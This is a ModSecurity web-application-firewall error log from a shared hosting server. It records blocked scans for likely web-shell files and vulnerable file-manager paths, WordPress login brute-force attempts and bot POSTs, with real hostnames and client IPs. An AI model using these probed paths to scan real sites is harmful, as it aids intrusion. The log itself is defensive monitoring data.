[Tue May 26 20:00:56.493389 2026] [security2:error] [pid 106517:tid 106675] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuoIZZc2DoU1lPnP1shwAAAJ4"]
[Tue May 26 20:00:56.672227 2026] [security2:error] [pid 113091:tid 113264] [client 103.163.220.18:40913] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/widgets/chosen.php"] [unique_id "ahWuoKPxBGSmlFNOy6pAQAAAAj8"]
[Tue May 26 20:00:57.180596 2026] [security2:error] [pid 112029:tid 112245] [client 103.163.220.54:63699] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/plugins/admin.php"] [unique_id "ahWuoaFW0C-ajaCsyFc-JAAAAWA"]
[Tue May 26 20:00:57.276445 2026] [security2:error] [pid 112029:tid 112216] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWun6FW0C-ajaCsyFc99wAAAUM"]
[Tue May 26 20:00:57.280479 2026] [security2:error] [pid 106517:tid 106778] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWun4ZZc2DoU1lPnP1sLAAAAQQ"]
[Tue May 26 20:00:57.281144 2026] [security2:error] [pid 113091:tid 113222] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWun6PxBGSmlFNOy6pAKAAAAhU"]
[Tue May 26 20:00:57.294974 2026] [security2:error] [pid 113091:tid 113227] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWun6PxBGSmlFNOy6pALQAAAho"]
[Tue May 26 20:00:57.299851 2026] [security2:error] [pid 113091:tid 113228] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWun6PxBGSmlFNOy6pALgAAAhs"]
[Tue May 26 20:00:57.303085 2026] [security2:error] [pid 106517:tid 106691] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWun4ZZc2DoU1lPnP1sRAAAAK0"]
[Tue May 26 20:00:57.312646 2026] [security2:error] [pid 106517:tid 106735] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWun4ZZc2DoU1lPnP1sOQAAANk"]
[Tue May 26 20:00:57.312851 2026] [security2:error] [pid 106517:tid 106683] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWun4ZZc2DoU1lPnP1sSgAAAKU"]
[Tue May 26 20:00:57.313901 2026] [security2:error] [pid 112029:tid 112197] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWun6FW0C-ajaCsyFc9_AAAATA"]
[Tue May 26 20:00:57.318460 2026] [security2:error] [pid 112029:tid 112282] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWun6FW0C-ajaCsyFc9-wAAAYU"]
[Tue May 26 20:00:57.322127 2026] [security2:error] [pid 112029:tid 112159] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWun6FW0C-ajaCsyFc-BQAAAQo"]
[Tue May 26 20:00:57.325967 2026] [security2:error] [pid 106517:tid 106663] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWun4ZZc2DoU1lPnP1sWwAAAJI"]
[Tue May 26 20:00:57.335201 2026] [security2:error] [pid 106517:tid 106724] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWun4ZZc2DoU1lPnP1sUQAAAM4"]
[Tue May 26 20:00:57.335272 2026] [security2:error] [pid 112029:tid 112208] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWun6FW0C-ajaCsyFc-CwAAATs"]
[Tue May 26 20:00:57.338132 2026] [security2:error] [pid 106517:tid 106765] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWun4ZZc2DoU1lPnP1sZwAAAPc"]
[Tue May 26 20:00:57.339974 2026] [security2:error] [pid 106517:tid 106661] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWun4ZZc2DoU1lPnP1sUAAAAJA"]
[Tue May 26 20:00:57.341195 2026] [security2:error] [pid 112029:tid 112259] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWun6FW0C-ajaCsyFc-BAAAAW4"]
[Tue May 26 20:00:57.344635 2026] [security2:error] [pid 112029:tid 112278] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWun6FW0C-ajaCsyFc-BgAAAYE"]
[Tue May 26 20:00:57.688111 2026] [security2:error] [pid 112029:tid 112192] [client 103.163.220.48:56807] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/plugins/filester/assets/css/404.php"] [unique_id "ahWuoaFW0C-ajaCsyFc-LQAAASs"]
[Tue May 26 20:00:57.698613 2026] [security2:error] [pid 106517:tid 106777] [client 35.213.179.237:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahWuoYZZc2DoU1lPnP1spwAAAQM"]
[Tue May 26 20:00:58.182865 2026] [security2:error] [pid 106517:tid 106687] [client 103.163.220.25:50655] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/fonts/"] [unique_id "ahWuooZZc2DoU1lPnP1svgAAAKk"]
[Tue May 26 20:00:58.507035 2026] [security2:error] [pid 106517:tid 106732] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuooZZc2DoU1lPnP1stAAAANY"]
[Tue May 26 20:00:58.669633 2026] [security2:error] [pid 113091:tid 113343] [client 103.163.220.41:50815] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wa/"] [unique_id "ahWuoqPxBGSmlFNOy6pAYAAAAo4"]
[Tue May 26 20:00:59.167634 2026] [security2:error] [pid 106517:tid 106751] [client 103.163.220.32:31615] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/maint/network/"] [unique_id "ahWuo4ZZc2DoU1lPnP1s4wAAAOk"]
[Tue May 26 20:00:59.457386 2026] [security2:error] [pid 106517:tid 106684] [client 178.238.226.119:54314] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/filemanager/dialog.php"] [unique_id "ahWuo4ZZc2DoU1lPnP1s8gAAAKY"]
[Tue May 26 20:00:59.672122 2026] [security2:error] [pid 106517:tid 106687] [client 103.163.220.20:25321] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/mini.php"] [unique_id "ahWuo4ZZc2DoU1lPnP1tAgAAAKk"]
[Tue May 26 20:00:59.833585 2026] [security2:error] [pid 113091:tid 113093] [remote 92.205.109.21:54182] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.109.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWuo6PxBGSmlFNOy6pAZQACPAE"]
[Tue May 26 20:01:00.175999 2026] [security2:error] [pid 106517:tid 106718] [client 103.163.220.47:34787] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/plugins/autoload_classmap.php"] [unique_id "ahWupIZZc2DoU1lPnP1tEgAAAMg"]
[Tue May 26 20:01:00.212865 2026] [core:error] [pid 112029:tid 112254] [client 157.230.234.54:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://consultrgb.com/
[Tue May 26 20:01:00.212889 2026] [core:error] [pid 112029:tid 112254] [client 157.230.234.54:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: https://consultrgb.com/
[Tue May 26 20:01:00.232163 2026] [security2:error] [pid 106517:tid 106724] [client 178.238.226.119:49153] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/app/webroot/filemanager/dialog.php"] [unique_id "ahWupIZZc2DoU1lPnP1tGgAAAM4"]
[Tue May 26 20:01:00.683161 2026] [security2:error] [pid 113091:tid 113345] [client 103.163.220.15:27919] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/fonts/wp-conflg.php"] [unique_id "ahWupKPxBGSmlFNOy6pAZwAAApA"]
[Tue May 26 20:01:00.822932 2026] [security2:error] [pid 106517:tid 106736] [client 178.238.226.119:56032] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/admin/filemanager/dialog.php"] [unique_id "ahWupIZZc2DoU1lPnP1tKAAAANo"]
[Tue May 26 20:01:01.164683 2026] [security2:error] [pid 106517:tid 106730] [client 103.163.220.46:38669] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/mah/function.php"] [unique_id "ahWupYZZc2DoU1lPnP1tNQAAANQ"]
[Tue May 26 20:01:01.440734 2026] [security2:error] [pid 112029:tid 112284] [client 178.238.226.119:56382] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/asset/filemanager/dialog.php"] [unique_id "ahWupaFW0C-ajaCsyFc-OwAAAYc"]
[Tue May 26 20:01:01.501516 2026] [security2:error] [pid 113091:tid 113094] [remote 92.205.109.21:54182] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.109.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWupaPxBGSmlFNOy6pAcAACKQI"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 20:01:01.703819 2026] [security2:error] [pid 113091:tid 113230] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWupaPxBGSmlFNOy6pAbAAAAh0"]
[Tue May 26 20:01:02.079955 2026] [security2:error] [pid 113091:tid 113239] [client 103.163.220.8:64119] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/Text/Diff/"] [unique_id "ahWupqPxBGSmlFNOy6pAdgAAAiY"]
[Tue May 26 20:01:02.134565 2026] [security2:error] [pid 113091:tid 113221] [client 139.84.217.147:40812] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.enattafoodparcel.org.thedebateafrica.org"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ahWupqPxBGSmlFNOy6pAeAAAAhQ"]
[Tue May 26 20:01:02.508747 2026] [security2:error] [pid 113091:tid 113269] [client 178.238.226.119:57756] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/admin/ckeditor/filemanager/dialog.php"] [unique_id "ahWupqPxBGSmlFNOy6pAhQAAAkQ"]
[Tue May 26 20:01:02.573436 2026] [security2:error] [pid 106517:tid 106682] [client 103.163.220.14:63791] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/system_log.php"] [unique_id "ahWupoZZc2DoU1lPnP1tXAAAAKQ"]
[Tue May 26 20:01:03.063273 2026] [security2:error] [pid 113091:tid 113278] [client 103.163.220.15:26111] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/blocks/comment-content/"] [unique_id "ahWup6PxBGSmlFNOy6pAkgAAAk0"]
[Tue May 26 20:01:03.139476 2026] [security2:error] [pid 113091:tid 113262] [client 178.238.226.119:58868] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/admin/ckeditor/plugins/filemanager/dialog.php"] [unique_id "ahWup6PxBGSmlFNOy6pAlQAAAj0"]
[Tue May 26 20:01:03.560905 2026] [security2:error] [pid 113091:tid 113301] [client 103.163.220.30:35841] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/images/"] [unique_id "ahWup6PxBGSmlFNOy6pAnAAAAmQ"]
[Tue May 26 20:01:03.791345 2026] [core:error] [pid 112029:tid 112269] [client 66.249.64.14:58186] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 20:01:03.791366 2026] [core:error] [pid 112029:tid 112269] [client 66.249.64.14:58186] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 20:01:03.867509 2026] [security2:error] [pid 113091:tid 113330] [client 178.238.226.119:59465] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/admin/assets/filemanager/dialog.php"] [unique_id "ahWup6PxBGSmlFNOy6pAoQAAAoE"]
[Tue May 26 20:01:04.033663 2026] [security2:error] [pid 106517:tid 106705] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWup4ZZc2DoU1lPnP1tegAAALs"]
[Tue May 26 20:01:04.069696 2026] [security2:error] [pid 112029:tid 112197] [client 103.163.220.7:46815] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/t.php"] [unique_id "ahWuqKFW0C-ajaCsyFc-UQAAATA"]
[Tue May 26 20:01:04.565140 2026] [security2:error] [pid 112029:tid 112285] [client 103.163.220.14:35915] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/worksec.php"] [unique_id "ahWuqKFW0C-ajaCsyFc-VwAAAYg"]
[Tue May 26 20:01:04.608057 2026] [security2:error] [pid 113091:tid 113348] [client 178.238.226.119:60049] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/admin/assets/ckeditor/filemanager/dialog.php"] [unique_id "ahWuqKPxBGSmlFNOy6pArAAAApM"]
[Tue May 26 20:01:05.065650 2026] [security2:error] [pid 112029:tid 112263] [client 103.163.220.38:35655] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/js/dist/development/"] [unique_id "ahWuqaFW0C-ajaCsyFc-ZQAAAXI"]
[Tue May 26 20:01:05.114842 2026] [security2:error] [pid 113091:tid 113251] [client 178.238.226.119:60170] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/admin/assets/global/plugins/filemanager/dialog.php"] [unique_id "ahWuqaPxBGSmlFNOy6pAtgAAAjI"]
[Tue May 26 20:01:05.496544 2026] [security2:error] [pid 106517:tid 106634] [remote 5.42.158.148:38622] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWuqYZZc2DoU1lPnP1tnwAAynI"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 20:01:05.572004 2026] [security2:error] [pid 113091:tid 113250] [client 103.163.220.44:62933] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/maint/chosen.php"] [unique_id "ahWuqaPxBGSmlFNOy6pAuQAAAjE"]
[Tue May 26 20:01:05.843951 2026] [security2:error] [pid 113091:tid 113223] [client 178.238.226.119:61459] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/admin/assets/plugins/filemanager/dialog.php"] [unique_id "ahWuqaPxBGSmlFNOy6pAvgAAAhY"]
[Tue May 26 20:01:06.067675 2026] [security2:error] [pid 106517:tid 106766] [client 103.163.220.42:57785] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/upgrade/"] [unique_id "ahWuqoZZc2DoU1lPnP1ttQAAAPg"]
[Tue May 26 20:01:06.419046 2026] [security2:error] [pid 106517:tid 106735] [client 178.238.226.119:60193] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/admin/assets/js/plugins/filemanager/dialog.php"] [unique_id "ahWuqoZZc2DoU1lPnP1twAAAANk"]
[Tue May 26 20:01:06.503722 2026] [security2:error] [pid 113091:tid 113268] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuqqPxBGSmlFNOy6pAwAAAAkM"]
[Tue May 26 20:01:06.571280 2026] [security2:error] [pid 106517:tid 106690] [client 103.163.220.8:34311] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/rest-api/fields/"] [unique_id "ahWuqoZZc2DoU1lPnP1tzAAAAKw"]
[Tue May 26 20:01:07.010220 2026] [security2:error] [pid 106517:tid 106715] [client 178.238.226.119:63084] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/admin/assets/js/ckeditor/filemanager/dialog.php"] [unique_id "ahWuq4ZZc2DoU1lPnP1t_gAAAMU"]
[Tue May 26 20:01:07.067233 2026] [security2:error] [pid 106517:tid 106753] [client 103.163.220.16:61117] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/blocks/comment-date/"] [unique_id "ahWuq4ZZc2DoU1lPnP1t_wAAAOs"]
[Tue May 26 20:01:07.515174 2026] [security2:error] [pid 106517:tid 106688] [client 178.238.226.119:63526] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/admin/assets/js/ckeditor/plugins/filemanager/dialog.php"] [unique_id "ahWuq4ZZc2DoU1lPnP1uEwAAAKo"]
